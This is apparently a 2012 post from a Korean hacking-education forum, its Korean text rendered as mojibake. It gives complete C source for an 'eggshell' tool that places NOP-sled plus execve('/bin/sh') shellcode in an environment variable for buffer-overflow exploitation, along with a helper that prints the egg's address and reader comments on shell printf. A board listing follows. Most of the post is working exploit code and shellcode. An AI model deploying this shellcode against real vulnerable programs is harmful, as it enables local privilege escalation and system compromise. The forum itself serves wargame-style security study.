1581, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   craft
   http://leewon21wkd.blog.me/
   eggshell ¼Ò½º ¹× »ç¿ë½Ã À¯ÀÇ»çÇ×

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1939 [º¹»ç]


#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i, eggsize=DEFAULT_EGG_SIZE;
        if (argc > 1) bsize   = atoi(argv[1]);
        if (argc > 2) offset  = atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);
        if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        addr = get_esp() - offset;
        printf("Using address: 0x%x\n", addr);
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
        {
                if(i == 1040)
                {
                        *(addr_ptr++) = 0x1234567;
                }
                else
                        *(addr_ptr++) = addr;
}
        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                *(ptr++) = NOP;
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];
        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg,"EGG=",4);
        putenv(egg);
        memcpy(buff,"RET=",4);
        putenv(buff);
        system("/bin/bash");
}

===========================================================================

ÀÌ ÇÁ·Î±×·¥À» ÄÄÆÄÀÏÇÏ°í ½ÇÇà½ÃÅ°°í Ãâ·ÂµÈ ÁÖ¼Ò°ªÀ» »ç¿ëÇϸé Á¦´ë·Î ½ÇÇàµÇÁö ¾Ê½À´Ï´Ù.
±×·¡¼­ Àú´Â ¿¡±×½©À» °ÅÁþ¸»ÀïÀ̶ó°í ºÎ¸£ÁÒ
ÁøÂ¥ ¿¡±×½©ÀÇ ÁÖ¼Ò¸¦ ¾ò±â À§Çؼ­´Â ÄÄÆÄÀÏµÈ À§ÀÇ ¿¡±×½©À» ½ÇÇà½ÃŲ ÈÄ

#include <stdio.h>
int main()
{
        printf("Addr = %p\n", getenv("EGG"));
}

À§ÀÇ Äڵ带 ÄÄÆÄÀÏ ÇÏ½Ã°í ½ÇÇà½ÃÅ°¸é ¿¡±×½©ÀÇ ÁøÂ¥ ÁÖ¼Ò°¡ Ãâ·ÂµË´Ï´Ù.

  Hit : 10771     Date : 2012/01/27 03:37



    
sohun5013 À½.. ¿ª½Ã ¿¡±×½©ÀÌ ÄÚµå ÁÖ¼Ò¸¦ °íÁ¤½ÃÄÑÁÖ´Â ¿ªÇÒÀ» ÇÏ´Â °Å±º¿ä.. 2012/01/27  
kjwon15 Àú ¹ØÀÇ ÄÚµå ÇÊ¿ä¾øÀÌ
printf '%p\n' $EGG
ÇÏ¸é µÉ°Å°°½À´Ï´Ù.
¿©±â¼­ printf´Â ÇÔ¼ö°¡ ¾Æ´Ï¶ó ¸®´ª½º ³»ºÎÀÇ ¸í·É¾îÀÔ´Ï´Ù.
2012/01/28  
craft kjwon15 // ±×·¸Äï¿ä Á¶¾ð °¨»çÇÕ´Ï´Ù!¤»¤» 2012/01/28  
sohun5013 $ printf '%p\n' $SHELLCODE
bash: printf: `p': invalid format character
¶ó°í ¶ß´Âµ¥¿ä;;
2012/01/28  
chaser1963 kjwon15´Ô
printf°¡ ¸®´ª½º ³»ºÎ¸í·É¾î¶ó°í ¸»¾¸ÇÏ½Ã´Â°Ç ½Ã½ºÅÛÄÝÀ̶ó´Â°Ç°¡¿ä ?
¶óÀ̺귯¸®·Î ¾Ë°íÀִµ¥...
2012/02/05  
BrokenPipe chaser1963//
shell ¸í·É¾î¿ä
C¾ð¾î ÇÔ¼ö¸»°í ¸®´ª½º ÇÁ·ÒÇÁÆ® »ó¿¡¼­ printf "abc" Ãĺ¸½Ã¸é
echo "abc" ¶û µ¿ÀÏÇÑ È¿°ú¸¦ ³»¿ä
2012/02/05  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 18795
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 271
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 761
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1595
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 965
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 1312
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
08/18 3833
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
08/17 3736
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
06/17 4544
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
06/17 4269
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
05/13 3973
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
03/30 3403
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
03/09 4098
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
11/27 4590
1566   È«º¸ÇÕ´Ï´Ù. ½Å»ý º¸¾ÈÄ¿¹Â´ÏƼÀÔ´Ï´Ù.     kimwoojin0952
10/26 4310
1565   ½Å±âÇÑ ÇÁ·Î±×·¡¹Ö ¾ð¾î[3]     koreal33t
09/06 4705
1564   À©µµ¿ì,¸®´ª½º¿¡¼­ ³» ip¸¦ È®ÀÎÇØ º¸ÀÚ [1]     koreal33t
09/06 3907
1563   CTF »çÀÌÆ®[1]     koreal33t
09/06 4568
1562   ÀÚ°ÝÁõ (¹®Á¦)»çÀÌÆ® [2]     koreal33t
09/06 4384
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org